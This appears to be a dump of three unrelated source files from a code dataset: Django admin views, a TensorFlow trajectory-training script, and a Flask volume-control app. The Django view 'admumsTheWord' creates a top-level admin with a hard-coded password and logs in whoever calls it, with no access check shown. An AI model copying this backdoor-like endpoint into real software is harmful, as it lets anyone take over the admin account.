    # FIX: use .get() -- direct indexing raised KeyError on a fresh session
    # where "adminLoggedIn" was never set; also matches loginPage's style.
    if not request.session.get("adminLoggedIn"):
        return redirect("/admin/login")
    else:
        context = {
            "admin": Admin.objects.get(id = request.session["currentAdminId"]),
            "admins": Admin.objects.all()
        }
        return render(request, 'AdminApp/admins.html', context)
# GET: Loads admin add page.
def adminNewPage(request):
    """GET: render the new-admin form."""
    return render(request,'AdminApp/newAdmin.html')
# POST: Submits the new admin.
def adminNewProcess(request):
    """POST: validate, create a new admin (bcrypt-hashed password) and log
    the new account in immediately."""
    if request.method == "GET":
        return redirect("/admin/admin/new")
    if request.method == "POST":
        errors = Admin.objects.registerValidator(request.POST)
        if len(errors) > 0:
            for key, value in errors.items():
                messages.error(request, value, extra_tags=key)
            return redirect("/admin/admin/new")
        else:
            # Hash the plaintext password before it ever touches the DB.
            newPassHash = bcrypt.hashpw(request.POST["password"].encode(), bcrypt.gensalt())
            newAdmin = Admin.objects.create(accessLevel = int(request.POST["accessLevel"]),
                firstName = request.POST["firstName"], lastName = request.POST["lastName"],
                email = request.POST["email"], passHash = newPassHash.decode())
            # The creator is switched into the new account's session.
            request.session["currentAdminId"] = newAdmin.id
            request.session["adminLoggedIn"] = True
            return redirect("/admin/admins")
# POST: Logging an administrator out.
def logout(request):
    """POST: mark the admin session as logged out and return to login."""
    request.session["adminLoggedIn"] = False
    return redirect("/admin/login")
# POST: Creating the first admin.
def admumsTheWord(request):
    """POST: bootstrap the seed 'admum' admin account (creating it on first
    call, reusing it afterwards) and log it into the current session."""
    # BUG FIX: the original tested len(QuerySet.__dict__), which inspects the
    # queryset *object's* attribute dict (always non-empty), not the row
    # count -- so the create branch could never run and Admin.objects.get()
    # crashed when the account was missing.  Use .exists() instead.
    if not Admin.objects.filter(firstName = "admum").exists():
        pH = bcrypt.hashpw("Password1!".encode(), bcrypt.gensalt())
        newAdmum = Admin.objects.create(accessLevel=3, firstName="admum", lastName="isTheWord",
            email="secret@password.shh", passHash=pH.decode())
        request.session["adminLoggedIn"] = True
        request.session["currentAdminId"] = newAdmum.id
        print("MAKING ACCOUNT")
        return redirect("/admin/orders")
    else:
        print("ACCOUNT EXISTS")
        admum = Admin.objects.get(firstName = "admum")
        print(admum.email)
        request.session["adminLoggedIn"] = True
        request.session["currentAdminId"] = admum.id
        return redirect("/admin/orders")
|
996,198 | 0b56d8186a412c96ebe75713cde18bf5e89a3de4 | import os
from datetime import datetime
import time
import json
import numpy as np
import tensorflow as tf
from tensorflow import keras
from netTrain.ResNet.net_model import ResNet50V2, ResNet50V2_fc
# from argoPrepare.load_tfrecord_argo import input_fn
from argoData.load_tfrecord_argo import input_fn
# from utils_custom.load_tfrecord import input_fn
from utils_custom.utils_argo import ADE_1S, FDE_1S, ADE_2S, FDE_2S, ADE_3S, FDE_3S, ADE_FDE_loss, metrics_array
from netTrain.Boost.boost_fast_sampler import HardSampleReservoir
from hparms import *
# ==============================================================================
# -- Constants -----------------------------------------------------------------
# ==============================================================================
# Enumerate GPUs in PCI bus order so the device index below is stable
# across drivers/runs.
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"  # specify which GPU(s) to be used
# ==============================================================================
# -- Function -----------------------------------------------------------------
# ==============================================================================
def lr_schedule(epoch):
    """Piecewise-constant learning-rate schedule.

    Fix: the original docstring claimed decay after epochs 80/120/160/180,
    which contradicted the code.  The actual schedule starts at 1e-3 and
    decays after epochs 10, 20, 25, and 30:

        epoch <= 10 : 1e-3
        11..20      : 1e-4
        21..25      : 1e-5
        26..30      : 1e-6
        > 30        : 5e-7

    Called once per epoch by the training loop.

    # Arguments
        epoch (int): zero-based index of the current epoch.

    # Returns
        lr (float32): learning rate for this epoch.
    """
    lr = 1e-3
    if epoch > 30:
        lr *= 0.5e-3
    elif epoch > 25:
        lr *= 1e-3
    elif epoch > 20:
        lr *= 1e-2
    elif epoch > 10:
        lr *= 1e-1
    print('Learning rate: ', lr)
    return lr
def main():
    """Train the ResNet50V2-fc trajectory model with hard-sample boosting.

    The first NORMAL_TRAIN_EPOCH epochs train normally; afterwards each
    fresh batch is routed through a HardSampleReservoir and samples whose
    per-sample ADE/FDE metrics are worse than the latest validation
    averages are re-queued for extra training passes.  The weights with
    the lowest validation loss (during the boosting phase) are saved.
    """
    keras.backend.clear_session()
    # TF1-style graph mode: batches are fetched manually via sess.run().
    sess = tf.Session()
    # Timestamp used to name checkpoint files for this run.
    logtime = datetime.now().strftime("%Y%m%d-%H%M%S")
    # logdir = "../../../logs/Boost/scalars/" + logtime
    # # Tensorboard
    # tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)
    # ==============================================================================
    # -- Dataset -----------------------------------------------------------------
    # ==============================================================================
    data_dir = ['../../../data/argo/forecasting/train/tf_record_4_channel/']
    train_dataset = input_fn(is_training=True, data_dir=data_dir, batch_size=BATCH_SIZE, num_epochs=NUM_EPOCHS)
    iterator = train_dataset.make_one_shot_iterator()
    input_batch, gt_batch = iterator.get_next()
    # Reuse the same loader for validation (no shuffling/augmentation path).
    data_dir = ['../../../data/argo/forecasting/val/tf_record_4_channel/']
    valid_dataset = input_fn(is_training=False, data_dir=data_dir, batch_size=BATCH_SIZE, num_epochs=NUM_EPOCHS)
    # ==============================================================================
    # -- Model -----------------------------------------------------------------
    # ==============================================================================
    # model = ResNet50V2(include_top=True, weights=None,
    #                    input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, NUM_CHANNELS),
    #                    classes=FUTURE_TIME_STEP*2)
    model = ResNet50V2_fc(weights=None,
                          input_img_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, NUM_CHANNELS),
                          input_ptraj_shape=(PAST_TIME_STEP*2, ),
                          node_num=2048,
                          classes=FUTURE_TIME_STEP*2)
    # NOTE(review): hard-coded warm-start checkpoint path — confirm this
    # file exists before running; load_weights raises if it is missing.
    model.load_weights('../../../logs/Boost/checkpoints/20190926-115346weights012.h5')
    # model = keras.utils.multi_gpu_model(model, gpus=4)
    model.compile(optimizer=keras.optimizers.Adam(lr=lr_schedule(0)),
                  loss=ADE_FDE_loss,
                  metrics=[ADE_1S, ADE_2S, ADE_3S, FDE_1S, FDE_2S, FDE_3S])
    # ==============================================================================
    # -- Training -----------------------------------------------------------------
    # ==============================================================================
    reservior = HardSampleReservoir()  # (sic) reservoir of hard samples
    min_loss = 10000  # best validation loss seen so far (sentinel start)
    for epoch in range(NUM_EPOCHS):
        print(f"Epoch: {epoch}/{NUM_EPOCHS}")
        # Manual schedule: optimizer.lr is overwritten at every epoch.
        model.optimizer.lr = lr_schedule(epoch)
        start_time = time.time()
        re = [0, 0]  # result of training loss and metrics
        for step in range(STEPS_PER_EPOCH):
            dt, gt = sess.run([input_batch, gt_batch])
            if epoch < NORMAL_TRAIN_EPOCH:
                # Warm-up phase: plain mini-batch training.
                out = model.train_on_batch(dt, gt)
                # Accumulate (loss/metrics * batch size, sample count) for averaging.
                re = [re[0] + np.array(out)*gt.shape[0], re[1] + gt.shape[0]]
            else:
                # Boosting phase: route the fresh batch through the reservoir,
                # then train on HARD_SAMPLE_RATIO extra hard batches per step.
                reservior.push_to_buffer(dt, gt)
                for i in range(1+HARD_SAMPLE_RATIO): # n*Hard samples + 1*normal samples
                    dt, gt = reservior.pop()
                    if gt.size:
                        out = model.train_on_batch(dt, gt)
                        re = [re[0] + np.array(out)*gt.shape[0], re[1] + gt.shape[0]]
                        # Find the hard samples
                        y_pred = model.predict(dt)
                        loss = metrics_array(gt, y_pred)
                        ind = []
                        # NOTE(review): valid_scores is first assigned at the end of
                        # an epoch; if NORMAL_TRAIN_EPOCH == 0 this branch reads it
                        # before assignment (NameError) — confirm NORMAL_TRAIN_EPOCH > 0.
                        for ii in range(loss.shape[0]):
                            # A sample is "hard" if any of its six ADE/FDE metrics is
                            # worse than the corresponding validation average.
                            if loss[ii, 0] > valid_scores[1] or loss[ii, 1] > valid_scores[2] \
                                    or loss[ii, 2] > valid_scores[3] or loss[ii, 3] > valid_scores[4] \
                                    or loss[ii, 4] > valid_scores[5] or loss[ii, 5] > valid_scores[6]:
                                ind.append(ii)
                        # Push the hard samples into reservoir
                        reservior.append(dt, gt, ind)
        # Evaluate the validation dataset
        # NOTE(review): steps hard-codes a validation-set size of 40127 samples
        # — verify against the actual record count if the dataset changes.
        valid_scores = model.evaluate(valid_dataset, verbose=0, steps=int(40127/BATCH_SIZE))
        # Print the training result
        print(f"--- Time: {int(time.time()-start_time)} second ---")
        for i, score in enumerate(re[0]):
            print(f"--{model.metrics_names[i]}: {score/re[1]}", end=' ')
        print("")
        for i, score in enumerate(valid_scores):
            if i == 0:
                print(f"--valid_loss: {valid_scores[0]}", end=' ')
            else:
                print(f"--{model.metrics_names[i]}: {score}", end=' ')
        print("")
        # Save the best model according to validation result
        if valid_scores[0] < min_loss:
            # Checkpoint only once boosting has started; min_loss still tracks
            # the warm-up epochs so early bests are not re-saved later.
            if epoch >= NORMAL_TRAIN_EPOCH:
                model.save_weights(f"../../../logs/Boost/checkpoints/{logtime}weights{epoch:03d}.h5")
            min_loss = valid_scores[0]
        print(f"reservoir size: {reservior.data_size}")
# Script entry point: run the full training loop.
if __name__ == '__main__':
    main()
|
996,199 | e5d80ef4e2fb311239260aad86a51ba018e2886e | from flask import Flask, render_template
import requests
import subprocess
app = Flask(__name__)
@app.route('/')
def root():
    """Render the landing page.

    Fix: the original assigned a local ``name = "Hello World"`` that was
    never used (not passed to the template); it has been removed.
    """
    return render_template('root.html', title='Home')
@app.route('/volume/vol_up')
def vol_up():
    """Raise the system volume by 10 via the SetVol.exe helper.

    Uses an argument list with the default shell=False instead of a
    shell string: no intermediate cmd.exe process and no shell parsing.
    Fire-and-forget (the process is not waited on), as in the original.
    """
    subprocess.Popen(['SetVol.exe', '+10'])
    return render_template('success.html', title='vol_up Success')
@app.route('/volume/vol_down')
def vol_down():
    """Lower the system volume by 10 via the SetVol.exe helper.

    Argument-list form avoids spawning a shell (default shell=False);
    fire-and-forget as in the original.
    """
    subprocess.Popen(['SetVol.exe', '-10'])
    return render_template('success.html', title='vol_down Success')
@app.route('/volume/vol_mute')
def vol_mute():
    """Mute the system volume via the SetVol.exe helper.

    Argument-list form avoids spawning a shell (default shell=False);
    fire-and-forget as in the original.
    """
    subprocess.Popen(['SetVol.exe', 'mute'])
    return render_template('success.html', title='vol_mute Success')
@app.route('/volume/vol_unmute')
def vol_unmute():
    """Unmute the system volume via the SetVol.exe helper.

    Fixes: (1) the success title was 'vol_unmuteSuccess' (missing space,
    inconsistent with the sibling volume views); (2) argument-list form
    avoids spawning a shell (default shell=False).  Fire-and-forget as
    in the original.
    """
    subprocess.Popen(['SetVol.exe', 'unmute'])
    return render_template('success.html', title='vol_unmute Success')
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.